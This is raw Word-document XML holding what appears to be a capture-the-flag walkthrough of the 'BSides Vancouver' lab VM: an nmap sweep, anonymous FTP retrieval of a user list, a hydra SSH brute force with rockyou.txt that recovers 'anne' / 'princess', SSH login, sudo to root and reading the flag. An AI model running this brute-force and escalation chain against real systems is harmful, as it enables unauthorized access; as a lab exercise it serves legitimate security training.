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64AF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BSides Vancouver</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00864AF5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Tuesday, August 2, 2022</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00864AF5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3:17 AM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidRDefault="00864A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64A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nmap -sS 192.168.1.0/24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[sudo] password for kali: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2022-08-03 05:18 EDT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Nmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>scan report for 192.168.1.1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(0.00059s latency).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999 closed tcp ports (reset)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STATE SERVICE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53/tcp open domain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52:54:00:12:35:00 (QEMU virtual NIC)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192.168.1.2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(0.0034s latency).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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>shown: 996 filtered tcp ports (no-response)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STATE SERVICE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open http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135/tcp open msrpc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445/tcp open microsoft-ds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1025/tcp open NFS-or-IIS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52:54:00:12:35:00 (QEMU virtual NIC)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192.168.1.3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 is up (0.00022s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>latency).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1000 scanned ports on 192.168.1.3 are in ignored states.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1000 filtered tcp ports (proto-unreach)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08:00:27:22:25:53 (Oracle VirtualBox virtual NIC)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192.168.1.12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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>is up (0.00042s latency).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997 closed tcp ports (reset)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STATE SERVICE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21/tcp open ftp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open ssh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80/tcp open http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08:00:27:F1:E5:AE (Oracle VirtualBox virtual NIC)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192.168.1.6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(0.0000030s l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>atency).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1000 scanned ports on 192.168.1.6 are in ignored states.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1000 closed tcp ports (reset)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256 IP addresses (5 hosts up) scanned in 11.71 seconds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???(kali?kali)-[~]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??$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???(kali?kali)-[~]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??$ ftp 192.168.1.12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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>d to 192.168.1.12.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220 (vsFTPd 2.3.5)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(192.168.1.12:kali): anonymous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230 Login successful.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Remote system type is UNIX.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binary mode to transfer files.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ls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229 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Entering Extended Passive Mode (|||51753|).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Here comes the directory listing.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drwxr-xr-x 2 65534 65534 4096 Mar 03 2018 public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Directory send OK.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cd public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250 Directory successfully changed.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ls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 Entering Extended Passive Mode (|||1439</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>7|).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Here comes the directory listing.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-rw-r--r-- 1 0 0 31 Mar 03 2018 users.txt.bk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Directory send OK.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get users.txt.bk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local: users.txt.bk remote: users.txt.bk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 Entering Extended Passive Mode (|||26448|).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Opening BINARY mode data conne</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ction for users.txt.bk (31 bytes).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100% |***********************************************************************| 31 5.07 KiB/s 00:00 ETA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Transfer complete.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31 bytes received in 00:00 (4.17 KiB/s)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users.txt.bk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abatchy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john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doomguy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-t 5 -V -f -l anne -P /usr/share/wordlists/rockyou.txt 192.168.1.12 ssh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v9.3 (c) 2022 by van Hauser/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> these *** ignore laws and ethics anyway).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(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https://github.com/vanhauser-thc/thc-hydra</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) starting at 2022-08-03 05:51:25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[DATA] max 5 tasks per 1 server, overall 5 tasks, 14344399 login trie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>s (l:1/p:14344399), ~2868880 tries per task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[DATA] attacking ssh://192.168.1.12:22/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"123456" - 1 of 14344399 [child 0] (0/0)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"12345" - 2 of 14344399 [ch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ild 1] (0/0)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"123456789" - 3 of 14344399 [child 2] (0/0)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"password" - 4 of 14344399 [child 3] (0/0)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[ATTEMPT] target 192.168.1.12 - login "anne" - pass </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"iloveyou" - 5 of 14344399 [child 4] (0/0)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"princess" - 6 of 14344399 [child 1] (0/0)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"1234567" - 7 of 14344399 [child 3] (0/0)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[22][ssh] host: 192.168.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1.12 login: anne password: princess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[STATUS] attack finished for 192.168.1.12 (valid pair found)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of 1 target successfully completed, 1 valid password found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(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https://github.com/vanhauser-thc</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>/thc-hydra</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) finished at 2022-08-03 05:51:39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ssh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anne@192.168.1.12</w:t>
        </w:r>
      </w:hyperlink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authenticity of host '192.168.1.12 (192.168.1.12)' can't be established.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ECDSA key fingerprint is SHA256:FhT9tr50Ps28yBw38pBWN+YEx5wCU/d8o1Ih22W4fyQ.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key is not known by any other names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Are you sure you want to continue connecting (yes/no/[fingerprint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>])? yes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Warning: Permanently added '192.168.1.12' (ECDSA) to the list of known hosts.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anne@192.168.1.12's password:</w:t>
        </w:r>
      </w:hyperlink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Welcome to Ubuntu 12.04.4 LTS (GNU/Linux 3.11.0-15-generic i686)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Documentation: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https://help.ubuntu.com/</w:t>
        </w:r>
      </w:hyperlink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382 packages can be updated.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275 updates are security updates.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 release '14.04.5 LTS' available.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'do-release-upgrade' to upgrade to it.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Last login: Sun Mar 4 16:14:55 2018 from 192.168.1.68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whoami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pwd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/home/anne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ls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ls -la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12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drwxr-xr-x 3 anne anne 4096 Aug 3 02:51 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drwxr-xr-x 7 root root 4096 Mar 4 2018 ..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drwx------ 2 anne anne 4096 Aug 3 02:51 .cache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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>e@bsides2018:~$ sudo su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[sudo] password for anne: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root@bsides2018:/home/anne# ls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root@bsides2018:/home/anne# pwd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/home/anne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root@bsides2018:/home/anne# cd /root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root@bsides2018:~# ls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flag.txt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root@bsides2018:~# cat flag.txt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Congratulations!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864A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5"/>
    <w:rsid w:val="008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D5C15-A65C-43C3-BC08-8B985434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e@192.168.1.12'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ne@192.168.1.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nhauser-thc/thc-hyd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anhauser-thc/thc-hydr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map.org" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://help.ubunt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2023-06-13T06:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-06-13T06:14:00Z</dcterms:modified>
</cp:coreProperties>
</file>